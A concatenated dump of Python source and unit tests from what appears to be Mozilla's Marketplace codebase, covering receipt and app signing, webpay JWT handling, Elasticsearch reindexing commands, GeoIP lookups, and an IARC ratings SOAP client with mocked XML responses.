@mock.patch('lib.crypto.receipt.urllib2.urlopen')
@mock.patch.object(settings, 'SIGNING_SERVER', 'http://localhost')
class TestReceipt(amo.tests.TestCase):
def test_called(self, urlopen):
urlopen.return_value = self.get_response(200)
sign('my-receipt')
eq_(urlopen.call_args[0][0].data, 'my-receipt')
def test_some_unicode(self, urlopen):
urlopen.return_value = self.get_response(200)
sign({'name': u'Вагиф Сәмәдоғлу'})
def get_response(self, code):
response = mock.Mock()
response.getcode = mock.Mock()
response.getcode.return_value = code
response.read.return_value = json.dumps({'receipt': ''})
return response
@raises(SigningError)
def test_error(self, urlopen):
urlopen.return_value = self.get_response(403)
sign('x')
def test_good(self, urlopen):
urlopen.return_value = self.get_response(200)
sign('x')
@raises(SigningError)
def test_other(self, urlopen):
urlopen.return_value = self.get_response(206)
sign('x')
class TestCrack(amo.tests.TestCase):
def test_crack(self):
eq_(crack(jwt.encode('foo', 'x')), [u'foo'])
def test_crack_mulitple(self):
eq_(crack('~'.join([jwt.encode('foo', 'x'), jwt.encode('bar', 'y')])),
[u'foo', u'bar'])
class PackagedApp(amo.tests.TestCase, amo.tests.AMOPaths):
fixtures = ['base/users'] + fixture('webapp_337141')
def setUp(self):
self.app = Webapp.objects.get(pk=337141)
self.app.update(is_packaged=True)
self.version = self.app.current_version
self.file = self.version.all_files[0]
self.file.update(filename='mozball.zip')
def setup_files(self):
# Clean out any left over stuff.
storage.delete(self.file.signed_file_path)
storage.delete(self.file.signed_reviewer_file_path)
# Make sure the source file is there.
if not storage.exists(self.file.file_path):
try:
# We don't care if these dirs exist.
os.makedirs(os.path.dirname(self.file.file_path))
except OSError:
pass
shutil.copyfile(self.packaged_app_path('mozball.zip'),
self.file.file_path)
@mock.patch('lib.crypto.packaged.os.unlink', new=mock.Mock)
class TestPackaged(PackagedApp, amo.tests.TestCase):
def setUp(self):
super(TestPackaged, self).setUp()
self.setup_files()
@raises(packaged.SigningError)
def test_not_app(self):
self.app.update(type=amo.ADDON_EXTENSION)
packaged.sign(self.version.pk)
@raises(packaged.SigningError)
def test_not_packaged(self):
self.app.update(is_packaged=False)
packaged.sign(self.version.pk)
@raises(packaged.SigningError)
def test_no_file(self):
[f.delete() for f in self.app.current_version.all_files]
packaged.sign(self.version.pk)
@mock.patch('lib.crypto.packaged.sign_app')
def test_already_exists(self, sign_app):
storage.open(self.file.signed_file_path, 'w')
assert packaged.sign(self.version.pk)
assert not sign_app.called
@mock.patch('lib.crypto.packaged.sign_app')
def test_resign_already_exists(self, sign_app):
storage.open(self.file.signed_file_path, 'w')
packaged.sign(self.version.pk, resign=True)
assert sign_app.called
@raises(ValueError)
def test_server_active(self):
with self.settings(SIGNED_APPS_SERVER_ACTIVE=True):
packaged.sign(self.version.pk)
@raises(ValueError)
def test_reviewer_server_active(self):
with self.settings(SIGNED_APPS_REVIEWER_SERVER_ACTIVE=True):
packaged.sign(self.version.pk, reviewer=True)
@mock.patch('lib.crypto.packaged._no_sign')
def test_server_inactive(self, _no_sign):
with self.settings(SIGNED_APPS_SERVER_ACTIVE=False):
packaged.sign(self.version.pk)
assert _no_sign.called
@mock.patch('lib.crypto.packaged._no_sign')
def test_reviewer_server_inactive(self, _no_sign):
with self.settings(SIGNED_APPS_REVIEWER_SERVER_ACTIVE=False):
packaged.sign(self.version.pk, reviewer=True)
assert _no_sign.called
def test_server_endpoint(self):
with self.settings(SIGNED_APPS_SERVER_ACTIVE=True,
SIGNED_APPS_SERVER='http://sign.me',
SIGNED_APPS_REVIEWER_SERVER='http://review.me'):
endpoint = packaged._get_endpoint()
assert endpoint.startswith('http://sign.me'), (
'Unexpected endpoint returned.')
def test_server_reviewer_endpoint(self):
with self.settings(SIGNED_APPS_REVIEWER_SERVER_ACTIVE=True,
SIGNED_APPS_SERVER='http://sign.me',
SIGNED_APPS_REVIEWER_SERVER='http://review.me'):
endpoint = packaged._get_endpoint(reviewer=True)
assert endpoint.startswith('http://review.me'), (
'Unexpected endpoint returned.')
@mock.patch.object(packaged, '_get_endpoint', lambda _: '/fake/url/')
@mock.patch('requests.post')
def test_inject_ids(self, post):
post().status_code = 200
post().content = '{"zigbert.rsa": ""}'
packaged.sign(self.version.pk)
zf = zipfile.ZipFile(self.file.signed_file_path, mode='r')
ids_data = zf.read('META-INF/ids.json')
eq_(sorted(json.loads(ids_data).keys()), ['id', 'version'])
########NEW FILE########
__FILENAME__ = util
import os
__all__ = ['generate_key']
def generate_key(byte_length):
"""Return a true random ascii string containing byte_length of randomness.
The resulting key is suitable for cryptogrpahy.
The key will be hex encoded which means it will be twice as long
as byte_length, i.e. 40 random bytes yields an 80 byte string.
byte_length must be at least 32.
"""
if byte_length < 32: # at least 256 bit
raise ValueError('um, %s is probably not long enough for cryptography'
% byte_length)
return os.urandom(byte_length).encode('hex')
########NEW FILE########
__FILENAME__ = webpay
import hashlib
import uuid
from django.conf import settings
import commonware.log
from mozpay.verify import verify_claims, verify_keys
import jwt
log = commonware.log.getLogger('z.crypto')
class InvalidSender(Exception):
pass
def get_uuid():
return 'webpay:%s' % hashlib.md5(str(uuid.uuid4())).hexdigest()
def verify_webpay_jwt(signed_jwt):
# This can probably be deleted depending upon solitude.
try:
jwt.decode(signed_jwt.encode('ascii'), settings.APP_PURCHASE_SECRET)
except Exception, e:
log.error('Error decoding webpay jwt: %s' % e, exc_info=True)
return {'valid': False}
return {'valid': True}
def sign_webpay_jwt(data):
return jwt.encode(data, settings.APP_PURCHASE_SECRET)
def parse_from_webpay(signed_jwt, ip):
try:
data = jwt.decode(signed_jwt.encode('ascii'),
settings.APP_PURCHASE_SECRET)
except Exception, e:
log.info('Received invalid webpay postback from IP %s: %s' %
(ip or '(unknown)', e), exc_info=True)
raise InvalidSender()
verify_claims(data)
iss, aud, product_data, trans_id = verify_keys(
data,
('iss', 'aud', 'request.productData', 'response.transactionID'))
log.info('Received webpay postback JWT: iss:%s aud:%s '
'trans_id:%s product_data:%s'
% (iss, aud, trans_id, product_data))
return data
########NEW FILE########
__FILENAME__ = fixup_mkt_index
"""
A Marketplace only command that finds apps missing from the search index and
adds them.
"""
import sys
from pyelasticsearch.exceptions import ElasticHttpNotFoundError
from django.core.management.base import BaseCommand
from addons.models import Webapp # To avoid circular import.
from mkt.webapps.models import WebappIndexer
from mkt.webapps.tasks import index_webapps
class Command(BaseCommand):
help = 'Fix up Marketplace index.'
def handle(self, *args, **kwargs):
index = WebappIndexer.get_index()
doctype = WebappIndexer.get_mapping_type_name()
es = WebappIndexer.get_es()
apps = Webapp.objects.values_list('id', flat=True)
missing_ids = []
for app in apps:
try:
res = es.get(index, doctype, app, fields='id')
except ElasticHttpNotFoundError:
# App doesn't exist in our index, add it to `missing_ids`.
missing_ids.append(app)
if missing_ids:
sys.stdout.write('Adding %s doc(s) to the index.'
% len(missing_ids))
index_webapps.delay(missing_ids)
else:
sys.stdout.write('No docs missing from index.')
########NEW FILE########
__FILENAME__ = reindex_app
"""
A Marketplace only command to re-index a specific app or apps.
Call like:
./manage.py reindex_app --apps=1234
Or call with a comma separated list of ids:
./manage.py reindex_app --apps=1234,2345,3456
"""
import logging
from optparse import make_option
from django.core.management.base import BaseCommand, CommandError
from mkt.webapps.tasks import index_webapps
log = logging.getLogger('z.elasticsearch')
class Command(BaseCommand):
option_list = BaseCommand.option_list + (
make_option('--apps',
help='Webapp ids to process. Use commas to separate '
'multiple ids.'),
)
help = __doc__
def handle(self, *args, **kw):
apps = kw.get('apps')
if not apps:
raise CommandError('The --apps option is required.')
ids = [int(a.strip()) for a in apps.split(',')]
index_webapps.delay(ids)
########NEW FILE########
__FILENAME__ = reindex_mkt
"""
A Marketplace only reindexing that indexes only apps.
This avoids a lot of complexity for now. We might want an all encompassing
reindex command that has args for AMO and MKT.
"""
import logging
import os
import sys
import time
from optparse import make_option
import pyelasticsearch
from celery import task
from django.conf import settings
from django.core.management.base import BaseCommand, CommandError
from amo.utils import chunked, timestamp_index
from addons.models import Webapp # To avoid circular import.
from lib.es.utils import (flag_reindexing_mkt, is_reindexing_mkt,
unflag_reindexing_mkt)
from mkt.webapps.models import WebappIndexer
logger = logging.getLogger('z.elasticsearch')
# Enable these to get full debugging information.
# logging.getLogger('pyelasticsearch').setLevel(logging.DEBUG)
# logging.getLogger('requests').setLevel(logging.DEBUG)
# The subset of settings.ES_INDEXES we are concerned with.
ALIAS = settings.ES_INDEXES['webapp']
if hasattr(settings, 'ES_URLS'):
ES_URL = settings.ES_URLS[0]
else:
ES_URL = 'http://127.0.0.1:9200'
ES = pyelasticsearch.ElasticSearch(ES_URL)
job = 'lib.es.management.commands.reindex_mkt.run_indexing'
time_limits = settings.CELERY_TIME_LIMITS[job]
@task
def delete_index(old_index):
"""Removes the index."""
sys.stdout.write('Removing index %r' % old_index)
ES.delete_index(old_index)
@task
def create_index(new_index, alias, settings):
"""Creates a mapping for the new index.
- new_index: new index name
- alias: alias name
- settings: a dictionary of settings
"""
sys.stdout.write(
'Create the mapping for index %r, alias: %r' % (new_index, alias))
# Update settings with mapping.
settings = {
'settings': settings,
'mappings': WebappIndexer.get_mapping(),
}
# Create index and mapping.
try:
ES.create_index(new_index, settings)
except pyelasticsearch.exceptions.IndexAlreadyExistsError:
raise CommandError('New index [%s] already exists' % new_index)
# Don't return until the health is green. By default waits for 30s.
ES.health(new_index, wait_for_status='green', wait_for_relocating_shards=0)
def index_webapp(ids, **kw):
index = kw.pop('index', None) or ALIAS
sys.stdout.write('Indexing %s apps' % len(ids))
qs = Webapp.indexing_transformer(Webapp.with_deleted.no_cache()
.filter(id__in=ids))
docs = []
for obj in qs:
try:
docs.append(WebappIndexer.extract_document(obj.id, obj=obj))
except Exception as e:
sys.stdout.write('Failed to index obj: {0}. {1}'.format(obj.id, e))
WebappIndexer.bulk_index(docs, es=ES, index=index)
@task(time_limit=time_limits['hard'], soft_time_limit=time_limits['soft'])
def run_indexing(index):
"""Index the objects.
- index: name of the index
Note: Our ES doc sizes are about 5k in size. Chunking by 100 sends ~500kb
of data to ES at a time.
TODO: Use celery chords here to parallelize these indexing chunks. This
requires celery 3 (bug 825938).
"""
sys.stdout.write('Indexing apps into index: %s' % index)
qs = WebappIndexer.get_indexable()
for chunk in chunked(list(qs), 100):
index_webapp(chunk, index=index)
@task
def flag_database(new_index, old_index, alias):
"""Flags the database to indicate that the reindexing has started."""
sys.stdout.write('Flagging the database to start the reindexation')
flag_reindexing_mkt(new_index=new_index, old_index=old_index, alias=alias)
time.sleep(5) # Give celeryd some time to flag the DB.
@task
def unflag_database():
"""Unflag the database to indicate that the reindexing is over."""
sys.stdout.write('Unflagging the database')
unflag_reindexing_mkt()
@task
def update_alias(new_index, old_index, alias, settings):
"""
Update the alias now that indexing is over.
We do 3 things:
1. Optimize (which also does a refresh and a flush by default).
2. Update settings to reset number of replicas.
3. Point the alias to this new index.
"""
sys.stdout.write('Optimizing, updating settings and aliases.')
# Optimize.
ES.optimize(new_index)
# Update the replicas.
ES.update_settings(new_index, settings)
# Add and remove aliases.
actions = [
{'add': {'index': new_index, 'alias': alias}}
]
if old_index:
actions.append(
{'remove': {'index': old_index, 'alias': alias}}
)
ES.update_aliases(dict(actions=actions))
@task
def output_summary():
aliases = ES.aliases(ALIAS)
sys.stdout.write(
'Reindexation done. Current Aliases configuration: %s\n' % aliases)
class Command(BaseCommand):
help = 'Reindex all ES indexes'
option_list = BaseCommand.option_list + (
make_option('--prefix', action='store',
help='Indexes prefixes, like test_',
default=''),
make_option('--force', action='store_true',
help=('Bypass the database flag that says '
'another indexation is ongoing'),
default=False),
)
def handle(self, *args, **kwargs):
"""Set up reindexing tasks.
Creates a Tasktree that creates a new indexes and indexes all objects,
then points the alias to this new index when finished.
"""
force = kwargs.get('force', False)
prefix = kwargs.get('prefix', '')
if is_reindexing_mkt() and not force:
raise CommandError('Indexation already occuring - use --force to '
'bypass')
elif force:
unflag_database()
# The list of indexes that is currently aliased by `ALIAS`.
try:
aliases = ES.aliases(ALIAS).keys()
except pyelasticsearch.exceptions.ElasticHttpNotFoundError:
aliases = []
old_index = aliases[0] if aliases else None
# Create a new index, using the index name with a timestamp.
new_index = timestamp_index(prefix + ALIAS)
# See how the index is currently configured.
if old_index:
try:
s = (ES.get_settings(old_index).get(old_index, {})
.get('settings', {}))
except pyelasticsearch.exceptions.ElasticHttpNotFoundError:
s = {}
else:
s = {}
num_replicas = s.get('number_of_replicas',
settings.ES_DEFAULT_NUM_REPLICAS)
num_shards = s.get('number_of_shards', settings.ES_DEFAULT_NUM_SHARDS)
# Flag the database.
chain = flag_database.si(new_index, old_index, ALIAS)
# Create the index and mapping.
#
# Note: We set num_replicas=0 here to decrease load while re-indexing.
# In a later step we increase it which results in a more efficient bulk
# copy in Elasticsearch.
# For ES < 0.90 we manually enable compression.
chain |= create_index.si(new_index, ALIAS, {
'analysis': WebappIndexer.get_analysis(),
'number_of_replicas': 0, 'number_of_shards': num_shards,
'store.compress.tv': True, 'store.compress.stored': True,
'refresh_interval': '-1'})
# Index all the things!
chain |= run_indexing.si(new_index)
# After indexing we optimize the index, adjust settings, and point the
# alias to the new index.
chain |= update_alias.si(new_index, old_index, ALIAS, {
'number_of_replicas': num_replicas, 'refresh_interval': '5s'})
# Unflag the database.
chain |= unflag_database.si()
# Delete the old index, if any.
if old_index:
chain |= delete_index.si(old_index)
chain |= output_summary.si()
self.stdout.write('\nNew index and indexing tasks all queued up.\n')
os.environ['FORCE_INDEXING'] = '1'
try:
chain.apply_async()
finally:
del os.environ['FORCE_INDEXING']
########NEW FILE########
__FILENAME__ = models
from django.db import models
from django.utils import timezone
class ReindexingManager(models.Manager):
"""Used to flag when an elasticsearch reindexing is occuring."""
def _flag_reindexing(self, site, new_index, old_index, alias):
"""Flag the database for a reindex on the given site."""
if self._is_reindexing(site):
return # Already flagged.
return self.create(new_index=new_index,
old_index=old_index,
alias=alias,
site=site)
def flag_reindexing_amo(self, new_index, old_index, alias):
"""Flag the database for an AMO reindex."""
return self._flag_reindexing('amo', new_index, old_index, alias)
def flag_reindexing_mkt(self, new_index, old_index, alias):
"""Flag the database for a MKT reindex."""
return self._flag_reindexing('mkt', new_index, old_index, alias)
def _unflag_reindexing(self, site):
"""Unflag the database for a reindex on the given site."""
self.filter(site=site).delete()
def unflag_reindexing_amo(self):
"""Unflag the database for an AMO reindex."""
self._unflag_reindexing('amo')
def unflag_reindexing_mkt(self):
"""Unflag the database for a MKT reindex."""
self._unflag_reindexing('mkt')
def _is_reindexing(self, site):
"""Return True if a reindexing is occuring for the given site."""
return self.filter(site=site).exists()
def is_reindexing_amo(self):
"""Return True if a reindexing is occuring on AMO."""
return self._is_reindexing('amo')
def is_reindexing_mkt(self):
"""Return True if a reindexing is occuring on MKT."""
return self._is_reindexing('mkt')
def get_indices(self, index):
"""Return the indices associated with an alias.
If we are reindexing, there should be two indices returned.
"""
try:
reindex = self.get(alias=index)
# Yes. Let's reindex on both indexes.
return [idx for idx in reindex.new_index, reindex.old_index
if idx is not None]
except Reindexing.DoesNotExist:
return [index]
class Reindexing(models.Model):
SITE_CHOICES = (
('amo', 'AMO'),
('mkt', 'MKT'),
)
start_date = models.DateTimeField(default=timezone.now)
old_index = models.CharField(max_length=255, null=True)
new_index = models.CharField(max_length=255)
alias = models.CharField(max_length=255)
site = models.CharField(max_length=3, choices=SITE_CHOICES)
objects = ReindexingManager()
class Meta:
db_table = 'zadmin_reindexing'
########NEW FILE########
__FILENAME__ = test_models
import mock
from nose.tools import eq_
import amo.tests
from lib.es.models import Reindexing
class TestReindexManager(amo.tests.TestCase):
def test_flag_reindexing(self):
assert Reindexing.objects.filter(site='foo').count() == 0
# Flagging for the first time.
res = Reindexing.objects._flag_reindexing('foo', 'bar', 'baz', 'quux')
eq_(Reindexing.objects.filter(site='foo').count(), 1)
eq_(res.site, 'foo')
eq_(res.new_index, 'bar')
eq_(res.old_index, 'baz')
eq_(res.alias, 'quux')
# Flagging for the second time.
res = Reindexing.objects._flag_reindexing('foo', 'bar', 'baz', 'quux')
assert Reindexing.objects.filter(site='foo').count() == 1
assert res is None
@mock.patch('lib.es.models.ReindexingManager._flag_reindexing')
def test_flag_reindexing_amo(self, flag_reindexing_mock):
Reindexing.objects.flag_reindexing_amo('bar', 'baz', 'quux')
assert flag_reindexing_mock.called_with([
('amo', 'bar', 'baz', 'quux')])
@mock.patch('lib.es.models.ReindexingManager._flag_reindexing')
def test_flag_reindexing_mkt(self, flag_reindexing_mock):
# This test doesn't run with AMO settings, no idea why.
Reindexing.objects.flag_reindexing_mkt('bar', 'baz', 'quux')
assert flag_reindexing_mock.called_with([
('mkt', 'bar', 'baz', 'quux')])
def test_unflag_reindexing(self):
assert Reindexing.objects.filter(site='foo').count() == 0
# Unflagging unflagged database does nothing.
Reindexing.objects._unflag_reindexing('foo')
assert Reindexing.objects.filter(site='foo').count() == 0
# Flag, then unflag.
Reindexing.objects.create(site='foo', new_index='bar', old_index='baz',
alias='quux')
assert Reindexing.objects.filter(site='foo').count() == 1
Reindexing.objects._unflag_reindexing('foo')
assert Reindexing.objects.filter(site='foo').count() == 0
# Unflagging another site doesn't clash.
Reindexing.objects.create(site='bar', new_index='bar', old_index='baz',
alias='quux')
Reindexing.objects._unflag_reindexing('foo')
assert Reindexing.objects.filter(site='bar').count() == 1
@mock.patch('lib.es.models.ReindexingManager._unflag_reindexing')
def test_unflag_reindexing_amo(self, unflag_reindexing_mock):
Reindexing.objects.unflag_reindexing_amo()
assert unflag_reindexing_mock.called_with([('amo')])
@mock.patch('lib.es.models.ReindexingManager._unflag_reindexing')
def test_unflag_reindexing_mkt(self, unflag_reindexing_mock):
# This test doesn't run with AMO settings, no idea why.
Reindexing.objects.unflag_reindexing_mkt()
assert unflag_reindexing_mock.called_with([('mkt')])
def test_is_reindexing(self):
assert Reindexing.objects.filter(site='foo').count() == 0
assert not Reindexing.objects._is_reindexing('foo')
Reindexing.objects.create(site='foo', new_index='bar', old_index='baz',
alias='quux')
assert Reindexing.objects._is_reindexing('foo')
# Reindexing on another site doesn't clash.
assert not Reindexing.objects._is_reindexing('bar')
@mock.patch('lib.es.models.ReindexingManager._is_reindexing')
def test_is_reindexing_amo(self, is_reindexing_mock):
Reindexing.objects.is_reindexing_amo()
assert is_reindexing_mock.called_with([('amo')])
@mock.patch('lib.es.models.ReindexingManager._is_reindexing')
def test_is_reindexing_mkt(self, is_reindexing_mock):
# This test doesn't run with AMO settings, no idea why.
Reindexing.objects.is_reindexing_mkt()
assert is_reindexing_mock.called_with([('mkt')])
def test_get_indices(self):
# Not reindexing.
assert Reindexing.objects.filter(alias='foo').count() == 0
assert Reindexing.objects.get_indices('foo') == ['foo']
# Reindexing on 'foo'.
Reindexing.objects.create(site='foo', new_index='bar', old_index='baz',
alias='quux')
assert Reindexing.objects.get_indices('quux') == ['bar', 'baz']
# Doesn't clash on other sites.
assert Reindexing.objects.get_indices('other') == ['other']
########NEW FILE########
__FILENAME__ = utils
from .models import Reindexing
# Shortcut functions.
is_reindexing_mkt = Reindexing.objects.is_reindexing_mkt
flag_reindexing_mkt = Reindexing.objects.flag_reindexing_mkt
unflag_reindexing_mkt = Reindexing.objects.unflag_reindexing_mkt
get_indices = Reindexing.objects.get_indices
########NEW FILE########
__FILENAME__ = test_geoip
from random import randint
import mock
import requests
from nose.tools import eq_
import amo.tests
from lib.geoip import GeoIP
def generate_settings(url='', default='restofworld', timeout=0.2):
return mock.Mock(GEOIP_URL=url, GEOIP_DEFAULT_VAL=default,
GEOIP_DEFAULT_TIMEOUT=timeout)
class GeoIPTest(amo.tests.TestCase):
@mock.patch('requests.post')
def test_lookup(self, mock_post):
url = 'localhost'
geoip = GeoIP(generate_settings(url=url))
mock_post.return_value = mock.Mock(status_code=200, json=lambda: {
'country_code': 'US',
'country_name': 'United States'
})
ip = '1.1.1.1'
result = geoip.lookup(ip)
mock_post.assert_called_with('{0}/country.json'.format(url),
timeout=0.2, data={'ip': ip})
eq_(result, 'us')
@mock.patch('requests.post')
def test_no_url(self, mock_post):
geoip = GeoIP(generate_settings())
result = geoip.lookup('2.2.2.2')
assert not mock_post.called
eq_(result, 'restofworld')
@mock.patch('requests.post')
def test_bad_request(self, mock_post):
url = 'localhost'
geoip = GeoIP(generate_settings(url=url))
mock_post.return_value = mock.Mock(status_code=404, json=lambda: None)
ip = '3.3.3.3'
result = geoip.lookup(ip)
mock_post.assert_called_with('{0}/country.json'.format(url),
timeout=0.2, data={'ip': ip})
eq_(result, 'restofworld')
@mock.patch('requests.post')
def test_timeout(self, mock_post):
url = 'localhost'
geoip = GeoIP(generate_settings(url=url))
mock_post.side_effect = requests.Timeout
ip = '3.3.3.3'
result = geoip.lookup(ip)
mock_post.assert_called_with('{0}/country.json'.format(url),
timeout=0.2, data={'ip': ip})
eq_(result, 'restofworld')
@mock.patch('requests.post')
def test_connection_error(self, mock_post):
url = 'localhost'
geoip = GeoIP(generate_settings(url=url))
mock_post.side_effect = requests.ConnectionError
ip = '3.3.3.3'
result = geoip.lookup(ip)
mock_post.assert_called_with('{0}/country.json'.format(url),
timeout=0.2, data={'ip': ip})
eq_(result, 'restofworld')
@mock.patch('requests.post')
def test_private_ip(self, mock_post):
url = 'localhost'
geoip = GeoIP(generate_settings(url=url))
addrs = [
'127.0.0.1',
'10.{0}.{1}.{2}'.format(randint(0, 255), randint(0, 255),
randint(0, 255)),
'192.168.{0}.{1}'.format(randint(0, 255), randint(0, 255)),
'172.{0}.{1}.{2}'.format(randint(16, 31), randint(0, 255),
randint(0, 255))
]
for ip in addrs:
result = geoip.lookup(ip)
assert not mock_post.called
eq_(result, 'restofworld')
########NEW FILE########
__FILENAME__ = client
# -*- coding: utf8 -*-
import base64
import functools
import os
from django.conf import settings
import commonware.log
from django_statsd.clients import statsd
from suds import client as sudsclient
log = commonware.log.getLogger('z.iarc')
root = os.path.join(settings.ROOT, 'lib', 'iarc', 'wsdl', settings.IARC_ENV)
wsdl = {
'services': 'file://' + os.path.join(root, 'iarc_services.wsdl'),
}
# Add in the whitelist of supported methods here.
services = ['Get_App_Info', 'Set_Storefront_Data', 'Get_Rating_Changes']
class Client(object):
"""
IARC SOAP client.
A wrapper around suds to make calls to IARC, leaving room for future WSDL
expansion. Example usage::
client = Client('services')
response = client.Get_App_Info(XMLString=xml)
print response # response is already base64 decoded.
"""
def __init__(self, wsdl_name):
self.wsdl_name = wsdl_name
self.client = None
def __getattr__(self, attr):
for name, methods in [('services', services)]:
if attr in methods:
return functools.partial(self.call, attr, wsdl=name)
raise AttributeError('Unknown request: %s' % attr)
def call(self, name, **data):
log.info('IARC client call: {0} from wsdl: {1}'.format(name, wsdl))
if self.client is None:
self.client = sudsclient.Client(wsdl[self.wsdl_name], cache=None)
# IARC requires messages be base64 encoded and base64 requires
# byte-strings.
for k, v in data.items():
if isinstance(v, unicode):
# Encode it as a byte-string.
v = v.encode('utf-8')
data[k] = base64.b64encode(v)
with statsd.timer('mkt.iarc.request.%s' % name.lower()):
response = getattr(self.client.service, name)(**data)
return base64.b64decode(response)
class MockClient(Client):
"""
Mocked IARC SOAP client.
"""
def call(self, name, **data):
responses = {
'Get_App_Info': MOCK_GET_APP_INFO,
'Set_Storefront_Data': MOCK_SET_STOREFRONT_DATA,
'Get_Rating_Changes': MOCK_GET_RATING_CHANGES,
}
return responses.get(name, '')
def get_iarc_client(wsdl):
"""
Use this to get the right client and communicate with IARC.
"""
if settings.IARC_MOCK:
return MockClient(wsdl)
return Client(wsdl)
MOCK_GET_APP_INFO = '''<?xml version="1.0" encoding="utf-16"?>
<WEBSERVICE xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" SERVICE_NAME="GET_APP_INFO" TYPE="RESPONSE">
<ROW>
<FIELD NAME="rowId" TYPE="int" VALUE="1" />
<FIELD NAME="submission_id" TYPE="string" VALUE="52" />
<FIELD NAME="title" TYPE="string" VALUE="Twitter" />
<FIELD NAME="company" TYPE="string" VALUE="Mozilla" />
<FIELD NAME="platform" TYPE="string" VALUE="Firefox" />
<FIELD NAME="rating_PEGI" TYPE="string" VALUE="16+" />
<FIELD NAME="descriptors_PEGI" TYPE="string" VALUE="Language, Online" />
<FIELD NAME="rating_USK" TYPE="string" VALUE="Rating Refused" />
<FIELD NAME="descriptors_USK" TYPE="string" VALUE="Explizite Sprache" />
<FIELD NAME="rating_ESRB" TYPE="string" VALUE="Mature 17+" />
<FIELD NAME="descriptors_ESRB" TYPE="string" VALUE="Strong Language" />
<FIELD NAME="rating_CLASSIND" TYPE="string" VALUE="14+" />
<FIELD NAME="descriptors_CLASSIND" TYPE="string" VALUE="Cont\xc3\xa9udo Sexual, Linguagem Impr\xc3\xb3pria" />
<FIELD NAME="rating_Generic" TYPE="string" VALUE="16+" />
<FIELD NAME="descriptors_Generic" TYPE="string" VALUE="" />
<FIELD NAME="storefront" TYPE="string" VALUE="Mozilla" />
<FIELD NAME="interactive_elements" TYPE="string" VALUE="Shares Info, Shares Location, Digital Purchases, Users Interact, " />
</ROW>
</WEBSERVICE>
'''
MOCK_SET_STOREFRONT_DATA = '''<?xml version="1.0" encoding="utf-16"?>
<WEBSERVICE xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" SERVICE_NAME="SET_STOREFRONT_DATA" TYPE="RESPONSE">
<ROW>
<FIELD NAME="action_status" TYPE="string" VALUE="OK - Storefront data Updated" />
<FIELD NAME="submission_id" TYPE="string" VALUE="52" />
<FIELD NAME="security_code" TYPE="string" VALUE="FZ32CU8" />
<FIELD NAME="title" TYPE="string" VALUE="Twitter" />
<FIELD NAME="company" TYPE="string" VALUE="Mozilla" />
<FIELD NAME="rating" TYPE="string" VALUE="16+" />
<FIELD NAME="descriptors" TYPE="string" VALUE="Language, Online" />
<FIELD NAME="interactive_elements" TYPE="string" VALUE="Shares Info, Shares Location, Digital Purchases, Users Interact, " />
</ROW>
</WEBSERVICE>
'''
MOCK_GET_RATING_CHANGES = '''<?xml version="1.0" encoding="utf-16"?>
<WEBSERVICE xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" SERVICE_NAME="GET_RATING_CHANGES" TYPE="RESPONSE">
<ROW>
<FIELD NAME="rowId" TYPE="int" VALUE="1" />
<FIELD NAME="change_date" TYPE="string" VALUE="11/12/2013" />
<FIELD NAME="submission_id" TYPE="string" VALUE="52" />
<FIELD NAME="security_code" TYPE="string" VALUE="FZ32CU8" />
<FIELD NAME="title" TYPE="string" VALUE="Twitter" />
<FIELD NAME="company" TYPE="string" VALUE="Mozilla" />
<FIELD NAME="email" TYPE="string" VALUE="[email protected]" />
<FIELD NAME="new_rating" TYPE="string" VALUE="14+" />
<FIELD NAME="new_descriptors" TYPE="string" VALUE="Cont\xc3\xa9udo Sexual, Linguagem Impr\xc3\xb3pria" />
<FIELD NAME="rating_system" TYPE="string" VALUE="CLASSIND" />
<FIELD NAME="change_reason" TYPE="string" VALUE="Significant issues found in special mission cut scenes." />
</ROW>
<ROW>
<FIELD NAME="rowId" TYPE="int" VALUE="2" />
<FIELD NAME="change_date" TYPE="string" VALUE="11/12/2013" />
<FIELD NAME="submission_id" TYPE="string" VALUE="68" />
<FIELD NAME="security_code" TYPE="string" VALUE="GZ32CU8" />
<FIELD NAME="title" TYPE="string" VALUE="Other App" />
<FIELD NAME="company" TYPE="string" VALUE="Mozilla" />
<FIELD NAME="email" TYPE="string" VALUE="[email protected]" />
<FIELD NAME="new_rating" TYPE="string" VALUE="Rating Refused" />
<FIELD NAME="new_descriptors" TYPE="string" VALUE="Explizite Sprache" />
<FIELD NAME="rating_system" TYPE="string" VALUE="USK" />
<FIELD NAME="change_reason" TYPE="string" VALUE="Discrimination found to be within German law." />
</ROW>
</WEBSERVICE>
'''
########NEW FILE########
__FILENAME__ = test_client
import test_utils
from ..client import Client, MockClient, get_iarc_client
class TestClient(test_utils.TestCase):
def setUp(self):
self.client = MockClient('services')
def test_bad_call(self):
with self.assertRaises(AttributeError):
self.client.Get_Something_Nonexistent()
def test_get_app_info(self):
xml = self.client.Get_App_Info(XMLString='Proper XML here')
assert xml.startswith('<?xml version="1.0" encoding="utf-16"?>')
assert ' SERVICE_NAME="GET_APP_INFO"' in xml
def test_set_storefront_data(self):
xml = self.client.Set_Storefront_Data(XMLString='Proper XML here')
assert xml.startswith('<?xml version="1.0" encoding="utf-16"?>')
assert ' SERVICE_NAME="SET_STOREFRONT_DATA"' in xml
def test_rating_changes(self):
xml = self.client.Get_Rating_Changes(XMLString='Proper XML here')
assert xml.startswith('<?xml version="1.0" encoding="utf-16"?>')
assert ' SERVICE_NAME="GET_RATING_CHANGES"' in xml
class TestRightClient(test_utils.TestCase):
def test_no_mock(self):
with self.settings(IARC_MOCK=False):
assert isinstance(get_iarc_client('services'), Client)
def test_mock(self):
with self.settings(IARC_MOCK=True):
assert isinstance(get_iarc_client('services'), MockClient)
########NEW FILE########
__FILENAME__ = test_utils_
# -*- coding: utf-8 -*-
import base64
import datetime
from django.test.utils import override_settings
from nose.tools import eq_
import amo.tests
from lib.iarc.client import get_iarc_client
from lib.iarc.utils import IARC_XML_Parser, render_xml
from mkt.constants import ratingsbodies
class TestRenderAppInfo(amo.tests.TestCase):
def setUp(self):
self.template = 'get_app_info.xml'
@override_settings(IARC_PASSWORD='s3kr3t')
def test_render(self):
xml = render_xml(self.template, {'submission_id': 100,
'security_code': 'AB12CD3'})
assert xml.startswith('<?xml version="1.0" encoding="utf-8"?>')
assert '<FIELD NAME="password" VALUE="s3kr3t"' in xml
assert '<FIELD NAME="submission_id" VALUE="100"' in xml
